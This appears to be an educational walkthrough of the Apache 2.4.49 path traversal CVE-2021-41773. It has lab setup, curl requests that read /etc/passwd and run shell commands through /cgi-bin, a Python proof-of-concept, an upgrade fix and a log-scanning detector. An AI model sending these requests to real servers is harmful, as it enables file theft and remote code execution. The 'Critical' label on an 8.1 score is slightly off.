CVE-2021-41773: Apache Path Traversal
Disclaimer: This content is for educational purposes only. Do not use this knowledge to attack systems without authorization. Always obtain proper permission before testing vulnerabilities.
What is CVE-2021-41773?
CVE-2021-41773 is a path traversal vulnerability in Apache HTTP Server 2.4.49. When mod_cgi is enabled, attackers can use ../ sequences to traverse directories and execute arbitrary code through CGI.
CVSS Score: 8.1 (Critical)
Affected Version: Apache HTTP Server 2.4.49
Environment Setup
Spin up a vulnerable Docker container:
# Run vulnerable Apache 2.4.49
docker run -d --name vuln-apache \
  -p 8080:80 \
  citizenstig/httpd:cve-2021-41773
Verify it’s running:
curl http://localhost:8080/
Vulnerability Explanation
The vulnerability is in how Apache handles URL paths with ../ sequences. The requests below write each ../ as .%2e/, with the second dot percent-encoded. When mod_cgi is enabled, this allows:
- Reading sensitive files outside document root (path traversal)
- Executing CGI scripts if certain conditions are met
Exploitation
Check for Path Traversal (LFI)
curl -v 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
If vulnerable, you’ll see /etc/passwd contents.
Attempt RCE (if mod_cgi enabled)
# Simple RCE check
curl -v 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' \
  -d 'echo CTF{test}'
Full POC Script
#!/usr/bin/env python3
import sys

import requests

# Base URL of the lab container; override with the first CLI argument.
TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"


def exploit(cmd):
    # Same traversal path string as the curl RCE check above.
    payload = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"
    # Request body sent with the POST.
    data = f"echo {cmd}"
    r = requests.post(f"{TARGET}{payload}", data=data)
    return r.text


# Test RCE
print("[*] Testing RCE...")
result = exploit("whoami")
print(result)
Remediation
Upgrade to Apache HTTP Server 2.4.51 or later.
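A defender-side check to go with the upgrade, added here as an example (it is not part of the original write-up or of any Apache tooling): it scans access-log lines for request paths that hide a `..` segment behind a percent-encoded dot, the shape of the requests shown under Exploitation. The log lines are constructed samples in combined log format, the function names are hypothetical, and the repeated decoding goes beyond the `.%2e` form on this page to cover nested encodings as well.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (documentation IPs).
SAMPLE_LOG = """\
203.0.113.5 - - [06/Oct/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 45 "-" "curl/7.68.0"
203.0.113.5 - - [06/Oct/2021:10:01:09 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1024 "-" "curl/7.68.0"
203.0.113.5 - - [06/Oct/2021:10:01:15 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 10 "-" "curl/7.68.0"
198.51.100.7 - - [06/Oct/2021:10:02:00 +0000] "GET /files/report%2Epdf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Oct/2021:10:02:30 +0000] "GET /cgi-bin/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 400 226 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
ENCODED_DOT = re.compile(r"%(?:25)*2e", re.IGNORECASE)  # %2e, %252e, %25252e, ...

def fully_decode(path, max_rounds=4):
    """Percent-decode repeatedly so nested encodings collapse to plain text."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_encoded_traversal(target):
    """True if the path hides a '..' segment behind a percent-encoded dot."""
    path = target.split("?", 1)[0]
    if not ENCODED_DOT.search(path):
        return False  # plain '../' or no encoded dot: not the form this page uses
    return ".." in fully_decode(path).split("/")

def scan(log_text):
    """Return one record per request whose path decodes to a traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and is_encoded_traversal(m["target"]):
            hits.append({
                "ip": m["ip"], "method": m["method"], "status": m["status"],
                "path": fully_decode(m["target"].split("?", 1)[0]),
                "answered": m["status"].startswith("2"),  # 2xx: triage first
            })
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Records with `answered` set got a 2xx response to a traversal-shaped request and are the ones to triage first.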